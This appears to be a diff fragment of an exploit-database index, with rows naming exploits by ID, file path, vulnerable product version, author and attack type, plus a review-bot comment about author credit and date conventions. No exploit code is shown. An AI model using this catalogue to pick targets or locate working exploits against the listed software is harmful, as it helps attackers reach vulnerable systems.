+47733,exploits/windows/local/47733.txt,"Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions",2019-12-02,hyp3rlinx,local,windows,
+47734,exploits/windows/local/47734.py,"Anviz CrossChex 4.3.12 - Local Buffer Overflow",2019-12-02,"Luis Catarino",local,windows,
+47735,exploits/xml/local/47735.txt,"Microsoft Excel 2016 1901 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
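Review bot: The author column for 47734 lists only `Luis Catarino`, while the file header in `exploits/windows/local/47734.py` credits `Luis Catarino & Pedro Rodrigues`; the sibling rows keep multi-word authors in quotes, so `"Luis Catarino & Pedro Rodrigues"` would record the credit as given. The date column is `2019-12-02` for every new row while the file headers carry `2019-11-30` and `2019-12-01`; presumably this is the publication date rather than the discovery date, and if so that convention is fine, but it is worth confirming since it is not documented in the header row.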
@@ -42039,3 +42045,5 @@ id,file,description,date,author,type,platform,port
47720,exploits/php/webapps/47720.txt,"Wordpress 5.3 - User Disclosure",2019-11-28,SajjadBnd,webapps,php,
47722,exploits/android/webapps/47722.py,"Mersive Solstice 2.8.0 - Remote Code Execution",2019-11-28,"Alexandre Teyar",webapps,android,
47725,exploits/php/webapps/47725.txt,"Online Inventory Manager 3.2 - Persistent Cross-Site Scripting",2019-11-29,"Cemal Cihad ÇİFTÇİ",webapps,php,
+47730,exploits/php/webapps/47730.txt,"SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery",2019-12-02,LiquidWorm,webapps,php,
+47731,exploits/php/webapps/47731.txt,"Dokuwiki 2018-04-22b - Username Enumeration",2019-12-02,"Talha ŞEN",webapps,php,